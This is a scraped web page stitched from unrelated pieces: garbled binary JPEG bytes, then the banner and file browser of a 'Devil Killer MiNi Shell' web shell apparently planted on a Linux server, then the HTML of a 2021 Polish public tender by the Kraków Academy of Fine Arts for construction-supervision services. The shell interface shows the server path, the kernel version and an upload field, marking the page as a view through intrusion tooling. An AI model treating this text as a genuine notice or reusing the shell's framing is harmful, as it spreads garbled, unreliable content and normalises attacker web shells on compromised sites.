JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211025/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211025/0024362002-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Nadzór inwestorski nad realizacją III etapu robót budowlanych i instalacyjnych w budynku ASP im. J. Matejki w Krakowie przy ul. Syrokomli 21 objętych projektem - umowa nr POIS.01.03.01-00-0051/16-00 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Akademia Sztuk Pięknych im. Jana Matejki w Krakowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">NIP 6750007570</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Jana Matejki 13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-157</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@asp.krakow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.asp.krakow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Nadzór inwestorski nad realizacją III etapu robót budowlanych i instalacyjnych w budynku ASP im. J. Matejki w Krakowie przy ul. Syrokomli 21 objętych projektem - umowa nr POIS.01.03.01-00-0051/16-00 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-eb976e65-3321-11ec-a3fb-0a24f8cd532c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00243620</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000104/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.27 Usługi nadzoru inwestorskiego - Smoleńsk 9 (branża budowlana, instalacji sanitarnych, elektryczna) Syrokomli 21 (branża budowlana, instalacji sanitarnych, elektryczna)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Fundusz Spójności w ramach Programu Operacyjnego Infrastruktura i Środowisko na lata 2014- 2020, Osi priorytetowej I Zmniejszenie emisyjności gospodarki, Działania 1.3 Wspieranie efektywności energetycznej w budynkach, Poddziałania 1.3.1 „Wspieranie efektywności energetycznej w budynkach użyteczności publicznej” </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platforma zakupowa.pl/pn/asp_krakow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W przedmiotowym postępowaniu<br/>komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu następujących środków<br/>komunikacji elektronicznej:<br/>1) Platformy zakupowej do obsługi postępowań o zamówienia publiczne, dostępnej pod adresem:<br/>https://platformazakupowa.pl/pn/asp_krakow<br/>2) poczty elektronicznej – adres e-mail: zp@asp.krakow.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W<br/>przedmiotowym postępowaniu komunikacja między Zamawiającym a Wykonawcami odbywa się przy<br/>użyciu następujących środków komunikacji elektronicznej:<br/>1) Platformy zakupowej do obsługi postępowań o zamówienia publiczne, dostępnej pod adresem:<br/>https://platformazakupowa.pl/pn/asp_krakow<br/>2) poczty elektronicznej – adres e-mail: zp@asp.krakow.pl<br/>- z zastrzeżeniem, iż oferta wraz z załącznikami, pełnomocnictwa, podmiotowe środki dowodowe oraz<br/>zobowiązanie podmiotów udostępniających zasoby mogą zostać przekazane wyłącznie za pomocą<br/>powyższej Platformy. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny<br/>sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w niniejszej SWZ. Zamawiający, zgodnie z<br/>art.67 ustawy Pzp, określa wymagania techniczne i organizacyjne sporządzania, wysyłania i odbierania<br/>korespondencji elektronicznej, tj.: 1) Minimalne wymagania sprzętowo-aplikacyjne konieczne do<br/>przesyłania plików za pomocą poczty elektronicznej:<br/>a)stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512kb/s,<br/>b) komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 2GB, procesor Intel IV<br/>2GHz,jeden z systemów operacyjnych - MS Windows, Mac Os, Linux,<br/>c) zainstalowana dowolna przeglądarka internetowa,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Acrobat Reader.<br/>2) Niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie Zakupowej -<br/>platformazakupowa.pl:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min.2 GB Ram, procesor Intel<br/>Pentium IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os<br/>x 10.4, Linux, lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja<br/>10.0,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie<br/>UTF8,<br/>g) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany wg czasu lokalnego serwera synchronizowanego z zegarem Głównego<br/>Urzędu Miar.<br/>3) Do danych zawierających dokumenty tekstowe, tekstowo-graficzne lub multimedialne stosuje się<br/>między innymi formaty plików: .txt; .rft; .pdf; .xps; .odt; .ods; .odp; .doc; .xls; .ppt; .docx; .xlsx; .pptx;<br/>.csv. Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym<br/>wskazaniem na .pdf.<br/>Szczegółowe informacje w zakresie wymagań techniczno - organizacyjnych dot. korespondencji elektronicznej opisano w rozdziale X SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Akademia Sztuk Pięknych im. Jana Matejki w Krakowie z<br/>siedzibą przy Placu Matejki 13, 31-157 Kraków (dalej „ASP w Krakowie”) przetwarza dane zawarte w<br/>ofertach albo wnioskach o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia<br/>publicznego, w wymaganych dokumentach, oświadczeniach, dane znajdujące się w publicznie<br/>dostępnych rejestrach (Krajowy Rejestr Sądowy, Centralna Ewidencja i Informacja o Działalności<br/>Gospodarczej RP, Krajowy Rejestr Karny) w celu prowadzenia postępowań o udzielenie zamówienia<br/>publicznego na podstawie przepisów ustawy z dnia 11 września 2019r. Prawo zamówień Publicznych<br/>(t.j. Dz.U. z 2021 r. poz. 1129). Wśród tych informacji mogą pojawiać się dane, które na<br/>gruncie Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/ 679 - z dnia 27 kwietnia 2016 r. -<br/>w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/ 46/ WE (ogólne rozporządzenie o<br/>ochronie danych) (europa.eu) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO” lub „Ogólne<br/>Rozporządzenie”, mają charakter danych osobowych. 2. Zgodnie z art. 13 ust. 1 i 2 Ogólnego<br/>Rozporządzenia, wszystkie osoby, które ubiegają się o udzielenie zamówienia / złożyły ofertę,<br/>Zamawiający informuje, że: Administratorem Danych jest Akademia Sztuk Pięknych im. Jana Matejki w Krakowie z siedzibą przy Placu Matejki 13, 31-157 Kraków, NIP: 675-00-07-570 REGON: 000275783 Pana/Pani dane osobowe są przetwarzane na podstawie art. 6 ust.1 lit. c RODO, tj. przetwarzanie jest<br/>niezbędne do wypełniania obowiązku prawnego ciążącego na Administratorze. Cel przetwarzania<br/>danych osobowych jest związany z prowadzeniem postępowania i realizacją umowy zawieranej w<br/>wyniku postępowania o udzielenie zamówienia publicznego, znak postępowania: BZP-3942-40/2021.<br/>4) ) Pani/Pana dane osobowe przetwarzane będą także w celu realizacji obowiązku prowadzenia<br/>ewidencji korespondencji i archiwizacji dokumentacji zgodnie z ustawą z dnia 14 lipca 1983r. o<br/>narodowym zasobie archiwalnym i archiwach (Dz. U. z 2020 r. poz. 164). Pana/Pani dane będą<br/>przechowywane przez okres 5 lat liczony od dnia 1 stycznia roku następującego po roku, w którym<br/>zakończone zostało postępowanie o udzielenie zamówienia publicznego, za wyjątkiem umów, które<br/>będą przechowywane przez okres lat 10.<br/>5)Pani/Pana dane pozyskane w związku z postępowaniem o udzielenie zamówienia publicznego<br/>przekazywane będą członkom komisji przetargowych i upoważnionym pracownikom ASP w Krakowie<br/>jak również wszystkim zainteresowanym podmiotom i osobom, gdyż co do zasady postępowanie o<br/>udzielenie zamówienia publicznego jest jawne. Ograniczenie dostępu do Pani/Pana danych, o których<br/>mowa wyżej może wystąpić jedynie w szczególnych przypadkach, jeśli jest to uzasadnione ochroną<br/>prywatności, zgodnie z art. 18 ust 5 pkt 1 i 2 ustawy Pzp. Pani/Pana dane osobowe mogą być<br/>udostępniane innym osobom lub podmiotom jeżeli obowiązek taki będzie wynikać z przepisów prawa.<br/>Do Pani/Pana danych mogą też mieć dostęp podmioty przetwarzające dane w naszym imieniu, np.<br/>podmioty świadczące pomoc prawną, usługi informatyczne, jak również inni administratorzy danych<br/>osobowych przetwarzający dane we własnym imieniu, np. podmioty prowadzące działalność pocztową<br/>lub kurierską. Zgodnie z RODO przysługuje Pani/Panu: a) prawo dostępu do swoich danych oraz<br/>otrzymania ich kopii; b) prawo do sprostowania (poprawiania) swoich danych; c) prawo do usunięcia<br/>danych osobowych, w sytuacji, gdy przetwarzanie danych nie następuje w celu wywiązania się z<br/>obowiązku wynikającego z przepisu prawa, d) prawo do ograniczenia przetwarzania danych, przy czym<br/>przepisy odrębne mogą wyłączyć możliwość skorzystania z tego prawa. Szczegółowe obowiązki<br/>informacyjne wynikające z rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z 27<br/>kwietnia 2016r. zostały wskazane w Specyfikacji Warunków Zamówienia - rozdział XXV.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">W postępowaniu o udzielenie zamówienia zgłoszenie<br/>żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia tego postępowania</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZP-3942-50/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest świadczenie usług związanych z pełnieniem funkcji Inspektora nadzoru inwestorskiego nad robotami budowlanymi w zakresie konstrukcyjno – budowlanym oraz w zakresie instalacji sanitarnych, przez ustanowionych inspektorów nadzoru budowlanego we wszystkich wymaganych prawem dla przedmiotowego zadania inwestycyjnego branżach oraz ścisła współpraca z Zamawiającym zgodnie z zasadami wiedzy technicznej i przepisami prawa powszechnie obowiązującego w Rzeczypospolitej Polskiej i współudział w pozyskaniu wszystkich decyzji administracyjnych umożliwiających użytkowanie i eksploatację remontowanego obiektu i wykonanych instalacji.<br/>2.	Świadczenie usług, o których mowa w ust. 1, Wykonawca zapewni przy pomocy zespołu inspektorów nadzoru w następujących branżach<br/>1)	Inspektor nadzoru w branży konstrukcyjno – budowlanej, którego wyznacza się na Koordynatora Zespołu, zgodnie z art. 27 ustawy - Prawo budowlane,<br/>2)	Inspektor nadzoru w branży sanitarnej.<br/>3.	Roboty budowlane i instalacyjne, objęte nadzorem stanowiącym przedmiot zamówienia, są wykonywane w ramach realizowanej kompleksowej termomodernizacji budynku Akademii Sztuk Pięknych w Krakowie przy ul. Syrokomli 21 (etap III) objętej projektem pn.: „Kompleksowa termomodernizacja budynku Akademii Sztuk Pięknych im. Jana Matejki w Krakowie przy ul. Syrokomli 21&#34;- umowa o dofinansowanie nr POIS.01.03.01-00-0051/16-00. <br/>4.	Zamówienie realizowane jest z udziałem środków Funduszu Spójności w ramach Programu Operacyjnego Infrastruktura i Środowisko na lata 2014-2020, Osi priorytetowej I Zmniejszenie emisyjności gospodarki, Działania 1.3 Wspieranie efektywności energetycznej w budynkach, Poddziałania 1.3.1 „Wspieranie efektywności energetycznej w budynkach użyteczności publicznej”.<br/>5. Zakres usług obejmuje pełnienie nadzoru inwestorskiego dla robót, realizowanych na podstawie umowy o roboty budowlane, obejmujące w swoim zakresie:<br/>1)	roboty wyburzeniowe w budynku wraz ze zmianami konstrukcyjnymi<br/>2)	wyburzenie istniejącego garażu (pom. gospodarczego),<br/>3)	okładzina konstrukcji stalowej płytami w EI 120 wraz z obudową okien połaciowych - płyta g-k p.poż. i wełna mineralna gr. 15 cm - budynek główny &#34;A&#34;<br/>4)	izolacja pozioma - Iniekcja budynek &#34;A&#34; - Roboty budowlane<br/>5)	ścianki działowe<br/>6)	remont konserwatorski wystroju<br/>7)	posadzki (częściowy zakres)<br/>8)	roboty wykończeniowe (częściowy zakres) <br/>9)	montaż nowej stolarki drzwiowej wewnętrznej (częściowy zakres)<br/>10)	wymiana i renowacja stolarki okiennej - budynek główny &#34;A&#34;<br/>11)	renowacja stolarki drzwiowej zewnętrznej - budynek główny &#34;A&#34;<br/>12)	wymiana pokrycia dachu - roboty budowlane pozostałe do wykonania – budynek główny &#34;A&#34;<br/>13)	instalacja wodno-kanalizacyjna - budynek główny &#34;A&#34; i budynek &#34;B&#34; – oficyna <br/>14)	instalacja wentylacji - budynek główny &#34;A&#34; i budynek &#34;B&#34; – oficyna<br/>15)	klimatyzacja + technologia (częściowy zakres)<br/>16)	instalacja grzewcza, ciepła technologicznego, c.w.u. (częściowy zakres)<br/> Na ten zakres zostało ogłoszone postępowanie oznaczone numerem referencyjnym BZP-3942-46/2021, lecz jeszcze nie została podpisana umowa z Wykonawcą robót budowlanych.<br/>Szczegółowy opis przedmiotu zamówienia i pozostałe wymagania oraz warunki realizacji<br/>zamówienia zostały określone w rozdziale III SWZ oraz w załączniku nr 2 do niniejszej SWZ - projektowane postanowienia umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">9 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp polegających na powtórzeniu podobnych usług jak w zamówieniu podstawowym. Całkowita wartość przewidywanych usług w wysokości 201 366,07 złotych netto, została uwzględniona przy obliczaniu wartości zamówienia podstawowego. Zostaną one udzielone w przypadku, gdy zaistnieje potrzeba sprawowania Nadzoru Inwestorskiego dla przyszłych przewidywanych robót budowlanych, w obiekcie na którym będą prowadzane prace zamówienia podstawowego. Zakres zamówień, których udzielenie przewiduje Zamawiający obejmie usługi pełnienia nadzoru Inwestorskiego w branżach, konstrukcyjno - budowlanej, instalacji sanitarnych i instalacji elektrycznych, co wynika z zakresu przewidywanych do wykonania robót budowlanych w ramach realizowanej kompleksowej termomodernizacji budynku Akademii Sztuk Pięknych w Krakowie przy ul. Syrokomli 21. Przewidziane do nadzorowania będą roboty budowlano - remontowe, roboty remontowe, instalacje sanitarne oraz roboty elektryczne. Warunkiem udzielenia zamówienia z wolnej ręki na powtórzenie podobnych usług, Wykonawcy zamówienia podstawowego, jest zrealizowanie usług objętych zamówieniem podstawowym prawidłowo, z najwyższą starannością, w zgodności z umową zawartą z Zamawiającym. Zamówienie, o którym mowa w art. 214 ust. 1 pkt 7 zostanie udzielone na warunkach zamówienia podstawowego, jak również zostanie uzgodnione wynagrodzenie oraz termin wykonania takiego zamówienia (planowany okres jego realizacji wynosi 12 miesięcy).</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe Inspektora nadzoru w branży konstrukcyjno-budowlanej (Koordynator Zespołu) w realizacji usług dla robót budowlanych w obiektach kubaturowych (kat. IX – XIX i kubatura pow. 5000 m3)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe Inspektora nadzoru w branży instalacji sanitarnych w realizacji usług dla robót instalacyjnych w obiektach kubaturowych (kat. IX – XIX i kubatura pow. 5000 m3)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe Inspektora nadzoru w branży konstrukcyjno-budowlanej (Koordynator Zespołu) w realizacji usług dla robót budowlanych w obiektach zabytkowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 5</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">5)	Doświadczenie zawodowe Inspektora nadzoru w branży instalacji sanitarnych w realizacji usług dla robót instalacyjnych w obiektach zabytkowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek zdolności technicznej lub zawodowej – Zamawiający wymaga w zakresie potencjału<br/>kadrowego, aby 